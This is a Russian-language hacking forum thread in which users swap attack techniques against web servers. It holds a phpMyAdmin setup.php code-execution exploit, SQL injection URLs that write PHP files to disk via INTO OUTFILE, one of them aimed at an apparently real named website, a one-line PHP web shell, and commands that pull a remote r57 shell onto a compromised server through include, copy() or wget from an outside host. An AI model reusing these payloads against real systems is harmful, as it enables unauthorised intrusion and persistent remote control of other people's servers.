Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Это сплоит на исполнение php кода
    #
    $pma_setup_url = 'http://site.com/phpMyAdmin/scripts/setup.php'; /*полный адрес скрипта установки phpMyAdmin*/
    #
    $ftp_code = 'ftp://user:p[email protected]/www/test.txt'; /*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?>*/

    В $pma_setup_url путь pma....
    В $ftp_code путь к текстовому файлу на фтпшке, в этом файле будет пхп код который ты хочеш испольнить,например тот же phpinfo();
    Что может быть проше?
     
  2. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    script srazu vypolnyaet $ftp_code
     
  3. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Вы просто пипец.. :(
    Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.

    Может я старомоден, но люблю начинать с конца. :confused:

    http://www.plan-art.co.uk/brochures.php?catid=-5+union+select+'<?php echo "Hello from antichat =)"; ?>',null+from+mysql.user+into+outfile+'C:/plan/def/hello.php'

    Урл без ввв > http://plan-art.co.uk/hello.php - палюсь :eek:
     
    #13823 v1d0qz, 26 Jun 2010
    Last edited: 26 Jun 2010
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    насколько знаю не можешь
     
    _________________________
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    я думаю что можно
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ну так колдуй и покажи нам запрос, мне тоже интересно ;)
     
    _________________________
  8. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    пока ниче неполучается:)
     
  9. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Груп_конкат там не катит, а значит нельзя.
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    а я о чем :)
     
    _________________________
  11. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    значит только лимитом,или прогой что куда проще...
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Залил shell <? @system($_REQUEST["v"]); ?>, работает.

    http://site.com/index.php?id=1+UNION+SELECT+1,'<? @system($_REQUEST["v"]); ?>',2,3,4,5,6+into+outfile+'/data/web/www/shell.php'+--+

    Как теперь залить r57shell.php , без загрузки формы?
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    я юзаю limit, но не все же таблицы наc интересуют ) дело 2 минут
     
    _________________________
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ?v=include("yoursite.ru/r57.php"); (allow_url_include=On)

    ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php;

    но это при eval, зачем system :confused:

    PHP:
    '<?php eval($_GET[v]);?>'
     
    _________________________
    #13834 Konqi, 26 Jun 2010
    Last edited: 26 Jun 2010
    2 people like this.
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    а почему сразу инклуд зделать нельзя?
    <?php include('http://site.ru/shell.php');?>
     
  16. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    потому что там allow_url_include Off Off
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    а если Allow_url_include=Off?? ;)

    написал выше...
     
    _________________________
  18. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    тогда <?system($_GET[cmd]);?>
    ?cmd=wget http://site.ru/shell.php
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    это уже другое дело, но нету гарантии что на сервере установлен wget )

    зачем затруднять все (((

    copy($source, $destination);
     
    _________________________
  20. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    там винда, вгет не пашет..

    Konqi хорошо написал, грузи через ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php
     
    #13840 wkar, 26 Jun 2010
    Last edited: 26 Jun 2010
Thread Status:
Not open for further replies.